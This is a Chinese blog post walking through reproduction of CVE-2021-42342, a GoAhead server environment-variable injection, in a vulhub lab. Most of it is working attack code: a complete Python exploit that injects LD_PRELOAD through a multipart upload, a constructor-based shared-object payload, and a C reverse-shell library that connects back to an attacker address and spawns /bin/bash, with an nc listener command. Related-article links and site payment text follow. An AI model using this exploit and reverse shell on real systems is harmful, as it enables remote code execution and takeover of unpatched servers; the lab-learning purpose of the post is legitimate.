【vulhub靶场复现系列】CVE-2021-42342 GoAhead Server 环境变量注入复现

已于 2022-10-04 20:23:19 修改
阅读量1.1k 收藏 2
点赞数 3
分类专栏: 记录一下vulhub靶场复现 文章标签: 安全 web安全
于 2022-09-01 21:53:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/126651816
版权

所需环境

环境搭建

漏洞复现

poc(漏洞复现)

shell反弹

poc(shell反弹)

所需环境:

  • Linux(kali)操作系统
  • vilhub靶场
  • windows7(nc)

环境搭建:

  1. 打开终端输入:cd /root/桌面/vulhub-master/goahead/CVE-2021-42342/进入靶场目录
  2. 在该目录执行命令:dockers-compose up -d
  3. 查看容器开启端口:docker ps
  4. 启动完成后,访问http://your-ip:8080/即可看到欢迎页面。访问http://your-ip:8080/cgi-bin/index即可查看到Hello页面,即为CGI执行的结果。

示例:

 漏洞复现

编写打印测试文件的poc代码如下(payload.c)

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World\r\n\r\n", 16);
    write(1, "Hacked\n", 7);
}

示例

 这样,before_main函数将在程序执行前被调用。编译以下代码:

gcc -s -shared -fPIC ./payload.c -o payload.so

示例:

 使用脚本poc.py来发送恶意数据包,复现漏洞:

poc:

后缀.py

import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult

PAYLOAD_MAX_LENGTH = 16384 - 200


def exploit(client, parts: ParseResult, payload: bytes):
    path = '/' if not parts.path else parts.path
    boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
    padding = 'a' * 2000
    content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
    data = fr'''POST {path} HTTP/1.1
Host: {parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={boundary}
Content-Length: {content_length}

--{boundary}
Content-Disposition: form-data; name="LD_PRELOAD";

/proc/self/fd/7
--{boundary}
Content-Disposition: form-data; name="data"; filename="1.txt"
Content-Type: text/plain

#payload#{padding}
--{boundary}--
'''.replace('\n', '\r\n')
    data = data.encode().replace(b'#payload#', payload)
    client.send(data)
    resp = client.recv(20480)
    print(resp.decode())


def main():
    target = sys.argv[1]
    payload_filename = sys.argv[2]

    with open(payload_filename, 'rb') as f:
        data = f.read()

    if len(data) > PAYLOAD_MAX_LENGTH:
        raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)

    parts = urlparse(target)
    port = parts.port
    if not parts.port:
        if parts.scheme == 'https':
            port = 443
        else:
            port = 80

    context = ssl.create_default_context()
    with socket.create_connection((parts.hostname, port), timeout=8) as client:
        if parts.scheme == 'https':
            with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:
                exploit(ssock, parts, data)

        else:
            exploit(client, parts, data)


if __name__ == '__main__':
    main()

示例:(因为我所在的路径中有payload.so所以最后直接加上payload.so就行了,注意终端所在路径。)

 shell反弹

POC:

后缀.c

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
 
char *server_ip="192.168.75.150";
uint32_t server_port=9999;
 
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

打开一个有nc的操作系统,查看该操作系统的IP地址:

示例:

 在打开shell.c,将里面的IP地址修改为nc所在操作系统的地址并将端口改为nc所监听的端口:

示例:

 修改完成之后返回nc所在操作系统,打开nc并监听:

nc -lvvp 9999 #这里端口可以自定义一个没有使用的端口

示例:

 返回kali,输入下列命令编辑POC(shell.c)

示例:

这时所在路径下会生成一个shell.so

示例:

 执行payload

示例:(此时脚本可能会报错,但没有影响)

 返回nc所在操作系统查看nc:

示例:

后记: 

我知道这种漏洞对于大佬来说很简单,但是都看到这了给萌新一个关注吧,谢谢。

一只学网安的小白。
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972 工作于 VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark: 对于vCenter6.7 U2 + vCenter 6.7U2 +在内存中运行网站,因此此Exp不适用于6.7 u2 +。 需要测试 vCenter 6.5 Linux(VCSA)/窗口等待测试 vCenter 6.7 Linux(VCSA)/窗口等待测试 vCenter 7.0 Linux(VCSA)/窗口等待测试 细节 突破为任意文件上传 存在问题的接口为/ui/vropspluginui/rest/services/uploadova ,完整路径( https://domain.com/ui/vropspluginui/r
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 docker push darryk/dev:1.0 在,您可以将使用Node.js应用程序创建的映像部署到您的K8s集群中。 webhook-deploy.yaml将在群集中部署所有必需的组件。 kubectl apply -f webhook-d
CVE-2021-42342漏洞及docker环境搭建
axdnoob的博客
07-18 2901
CVE-2021-42342 漏洞
vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞
Wiofgb的博客
10-01 932
CVE-2021-41277 Metabase 信息泄露漏洞
vulhub-spring漏洞
qq_51922767的博客
09-14 2463
vulhub-spring漏洞
漏洞------Webmin 远程命令执行漏洞(CVE-2019-15107)
Z_Grant的博客
09-23 7200
文章目录一,webmin简介二,漏洞概述三,漏洞(1)环境搭建(2)exp四,漏洞分析五,漏洞修 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
vulhub漏洞-Apache APISIX 默认密钥漏洞(CVE-2020-13945)
weixin_45095113的博客
12-21 620
vulhub漏洞-Apache APISIX 默认密钥漏洞(CVE-2020-13945)
vulhub漏洞 CVE-2016-3088
最新发布
03-14
vulhub漏洞 CVE-2016-3088
vulhub靶场框架漏洞手册(strusts2\shiro\weblogic)附工具链接
zwy15288408160的博客
12-15 1393
工具+手工vulhub靶场下的框架漏洞,包括struts2远程代码执行(2-029,s2-061,s2-001),shiro反序列化漏洞(CVE-2016-4437),weblogic反序列化漏洞(CVE-2017-10271,CVE-2018-2628,CVE-2018-2894,CVE-2020-14882,ssrf,weak-password)。持续更新中...持续更新中...
【打靶】vulhub打靶系列3---Chronos
weixin_52351575的博客
10-26 151
结合之前的方法(arp探测、ping检测),因为我们的靶机和攻击机都在第二层,所以打靶时候我们更依赖arp协议tips:我在运行期间发,netdiscover窗口没关闭的前提下是可以一直检测的,也就是说在探活期间有新主机加入可以被立即识别到。​ nmap -p- -sV -T4 192.168.56.104 ssh可以爆破(hydra)http直接去访问(先看下80端口下的页面)发页面没有什么东西,两种思路:发其源码中有调用一个脚本发进行了编码通过cyberchef美化一下,地址​​CyberCh
【漏洞CVE-2021-42342 GoAhead Server
m0_53121608的博客
07-13 92
【漏洞CVE-2021-42342 GoAhead Server
vulhub靶场搭建及漏洞教程
热门推荐
Cwillchris的博客
03-25 1万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Vulhub靶场之Tomcat漏洞
weixin_66717977的博客
06-30 374
tomcat漏洞
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值